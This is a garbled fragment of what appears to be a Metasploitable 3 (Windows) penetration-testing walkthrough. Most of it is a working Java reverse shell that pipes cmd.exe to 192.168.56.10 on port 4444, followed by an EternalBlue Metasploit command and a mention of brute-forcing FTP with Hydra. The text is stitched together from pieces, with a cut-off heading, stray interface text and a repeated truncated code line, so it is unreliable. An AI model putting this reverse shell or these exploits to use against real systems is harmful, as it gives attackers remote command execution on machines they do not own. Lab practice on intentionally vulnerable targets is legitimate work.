🛡️ Penetration Testing Report: Metasploitable 3 (Windows) 1. Executive Summary
String host="192.168.56.10";
int port=4444;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(), pe=p.getErrorStream(), si=s.getInputStream();
OutputStream po=p.getOutputStream(), so=s.getOutputStream();
while(!s.isClosed()) {
while(pi.available()>0) so.write(pi.read());
while(pe.available()>0) so.write(pe.read());
while(si.available()>0) po.write(si.read());
so.flush();
po.flush();
Thread.sleep(50);
try p.exitValue();break; catch (Exception e){}
};
p.destroy();
s.close();
use exploit/windows/smb/ms17_010_eternalblue set RHOSTS Use code with caution. metasploitable 3 windows walkthrough
Often, weak credentials are the easiest vulnerability to exploit. The Nmap scan identifies the FTP service. We can use Hydra or Metasploit to brute force it. Socket s=new Socket(host